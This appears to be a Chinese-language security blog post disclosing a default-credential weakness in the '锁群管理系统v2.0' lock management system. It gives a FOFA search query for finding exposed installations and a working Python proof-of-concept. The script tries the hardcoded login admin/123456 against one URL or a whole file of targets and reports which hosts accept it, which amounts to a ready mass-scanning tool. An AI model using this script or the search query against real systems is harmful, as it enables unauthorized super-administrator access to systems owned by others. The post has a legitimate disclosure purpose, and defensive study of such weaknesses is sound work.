锁群管理系统v2.0存在弱口令漏洞

简介: 锁群管理系统v2.0存在弱口令漏洞

漏洞简介


FOFA

title="锁群管理系统v2.0"

4a469281b9c2e6c8e407da540b5a06e1.png

漏洞影响

锁群管理系统v2.0

漏洞复现

万能的度娘上查询到锁群管理系统操作手册里面有账号和密码

d268167dd800f2d5cfbe8d79d5fcd528.png

后台界面

396ce309e452f96c525bbe1a8a2b632a.png

在后台登陆界面使用操作手册里面的账号和密码成功的登录后台

687daead93c27277ab7b6236f456fd63.png

直接获得超级管理员的权限

poc


import requests
import sys
import argparse
from requests.packages.urllib3.exceptions import InsecureRequestWarning  #消除警告
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)  # 消除警告
def lemonlove7():
    print('python xxx.py -u/--url http://xxx.xxx.xxx.xxx')
    print('python xxx.py -f/--file x.txt')
    print('FOFA:title="锁群管理系统v2.0"')
    print('lemonlove7')
if len(sys.argv)==1:
    lemonlove7()
    sys.exit()
p = argparse.ArgumentParser(description='lemonlove7')
p.add_argument('-u','--url',help='输入url',default='')
p.add_argument('-f','--file',help='输入文件',default='')
a = p.parse_args()
url = a.url
file = a.file
headers= {
    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36',
    'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
    'Cookie':'ASP.NET_SessionId=pjb41rehvxilis32hfgus0r5'
}
if url != '':
    furl = url
    try:
        url =furl+'/inc/CheckLogin.aspx?checkLogin=login&un=admin&pw=123456'
        r= requests.get(url=url,headers=headers,timeout=10,verify=False)
        if r.status_code == 200 and '0' in r.text:
            print(furl+'存在弱口令')
        else:
            print(furl+'不存在弱口令')
    except Exception as e:
        print(furl+'不存在弱口令')
if file !='':
    text =file
    f = open(text,'r+')
    for i in f.readlines():
        url = i.strip()
        if url.startswith('http:') != 1 and url.startswith('https:') != 1:
            url = 'http://' + url
        url1 = url
        url2=url
        try:
            url1 = url+'/inc/CheckLogin.aspx?checkLogin=login&un=admin&pw=123456'
            r =requests.post(url=url1,headers=headers,timeout = 10,verify=False)
            if r.status_code==200 and '0' in r.text:
                print(url2+'存在弱口令')
            else:
                print(url2+'不存在弱口令')
        except Exception as e:
            print(url2+'不存在弱口令')

单个检测如下

640.png

批量检测如下

640.png


相关文章
|
6月前
|
安全 数据安全/隐私保护
渗透攻击实例-后台弱口令
渗透攻击实例-后台弱口令
|
9月前
|
安全 前端开发 JavaScript
信息服务上线渗透检测网络安全检查报告和解决方案2(安装文件信息泄漏、管理路径泄漏、XSS漏洞、弱口令、逻辑漏洞、终极上传漏洞升级)
信息服务上线渗透检测网络安全检查报告和解决方案2(安装文件信息泄漏、管理路径泄漏、XSS漏洞、弱口令、逻辑漏洞、终极上传漏洞升级)
131 0
|
7月前
|
SQL 存储 开发框架
MSSQL弱口令绕过某数字上线
MSSQL弱口令绕过某数字上线
102 0
|
7月前
|
安全 Shell API
绕过反病毒添加管理员用户小结
绕过反病毒添加管理员用户小结
66 0
绕过反病毒添加管理员用户小结
|
10月前
|
安全 前端开发 JavaScript
代码审计——硬编码口令/弱口令详解
代码审计——硬编码口令/弱口令详解
283 0
|
10月前
|
网络安全 数据安全/隐私保护 计算机视觉
《网络安全0-100》口令系统
《网络安全0-100》口令系统
101 0
|
10月前
|
存储 安全 网络安全
《网络安全0-100》口令机制
《网络安全0-100》口令机制
107 0
|
存储 算法 安全
|
JavaScript 中间件 数据安全/隐私保护
【每日渗透笔记】后台弱口令+未授权尝试
【每日渗透笔记】后台弱口令+未授权尝试
159 0
【每日渗透笔记】后台弱口令+未授权尝试
|
安全 程序员 测试技术
网站安全检测之用户密码找回网站漏洞的安全分析与利用
我们SINE安全在对网站,以及APP端进行网站安全检测的时候发现很多公司网站以及业务平台,APP存在着一些逻辑上的网站漏洞,有些简简单单的短信验证码可能就会给整个网站带来很大的经济损失,很简单的网站功能,比如用户密码找回上,也会存在绕过安全问题回答,或者绕过手机号码,直接修改用户的账户密码。
155 0
网站安全检测之用户密码找回网站漏洞的安全分析与利用